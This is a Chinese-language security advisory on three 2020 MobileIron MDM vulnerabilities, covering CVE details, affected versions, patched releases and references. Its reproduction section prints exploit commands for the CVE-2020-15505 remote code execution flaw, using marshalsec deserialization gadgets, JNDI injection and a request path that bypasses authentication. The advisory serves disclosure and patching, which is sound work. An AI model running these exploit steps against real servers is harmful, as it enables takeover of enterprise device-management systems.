MobileIron | 11月MDM多个安全漏洞通告

发布时间 2020-11-26

0x00 漏洞概述

产品名称

CVE ID

类 型

漏洞等级

远程利用

MobileIron Core &   Connector、Sentry、Monitor and Reporting Database   (RDB)

CVE-2020-15505

RCE

严重

MobileIron Core&Connector

CVE-2020-15506

身份验证绕过

严重

MobileIron Core

CVE-2020-15507

任意文件读取

高危

 

0x01 漏洞详情

 

image.png

 

MobileIron是全球领先且发展最迅速的移动IT解决方案厂商之一,在全球有近20000家企业使用MobileIron的移动设备管理解决方案(MDM)。

2020年10月22日,MobileIron发布更新公告,MDM中存在的多个安全漏洞(CVE-2020-15505、CVE-2020-15506和CVE-2020-15507)已在6月15日发布的补丁中被修复。漏洞详情如下: 

MobileIron远程代码实行漏洞(CVE-2020-15505)

该漏洞是MobileIron移动设备管理(MDM)中的一个远程代码实行漏洞,其CVSS评分9.8。攻击者可以利用此漏洞实行任意代码并控制企业的服务器。

该漏洞的PoC已于9月在Github上被公布。近日,该漏洞正在被APT组织和网络犯罪组织积极尝试利用。

 

漏洞复现:

Groovy反序列化小工具

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Groovy "/bin/bash" "-c" "" > exp.ser

python hessian.py -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService' -p exp.ser

image.png

 

本地JNDI注入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C ""

java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://:1099/> exp

python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService'

image.png

image.png

 

影响范围:

MobileIron Core&Connector:10.3.0.3及之前版本、10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3、10.5.1.0、10.5.2.0、10.6.0.0

Sentry:9.7.2及之前版本、9.8.0

Monitor and Reporting Database (RDB):2.0.0.1及之前版本

 

 

MobileIron身份验证绕过漏洞(CVE-2020-15506)

该漏洞是MobileIron移动设备管理(MDM)中的一个身份验证绕过漏洞,其CVSS评分9.8。攻击者可利用此漏洞绕过身份验证机制。

影响范围:

MobileIron Core&Connector:

10.3.0.3及之前版本

10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3

10.5.1.0、10.5.2.0

10.6.0.0

 

 

MobileIron任意文件读取漏洞(CVE-2020-15507)

该漏洞是MobileIron移动设备管理(MDM)中的一个任意文件读取漏洞,其CVSS评分7.5。攻击者可利用此漏洞读取文件系统中的敏感信息。

影响范围:

MobileIron Core

10.3.0.3及之前版本

10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3

10.5.1.0、10.5.2.0

10.6.0.0

 

 

0x02 处置建议

目前MobileIron已经发布了相关更新,建议参升级至如下版本。

MobileIron Core & Enterprise Connector

v10.3.0.4、v10.4.0.4、v10.5.1.1、v10.5.2.1、v10.6.0.或更高版本。

MobileIron Sentry

v9.7.3、v9.8.1或更高版本。

MobileIron Monitor and Reporting Database (RDB)

v2.0.0.2或更高版本。

 

补丁链接:

https://help.mobileiron.com/s/article-detail-page?Id=kA12T000000g065SAA

 

0x03 参考链接

https://www.mobileiron.com/en/blog/mobileiron-security-updates-available

https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/

https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505

 

0x04 时间线

2020-07-01  MobileIron发布安全公告

2020-10-22  MobileIron更新安全公告

2020-11-26  VSRC发布安全通告

 

0x05 附录

 

CVSS评分标准官网:http://www.first.org/cvss/

image.png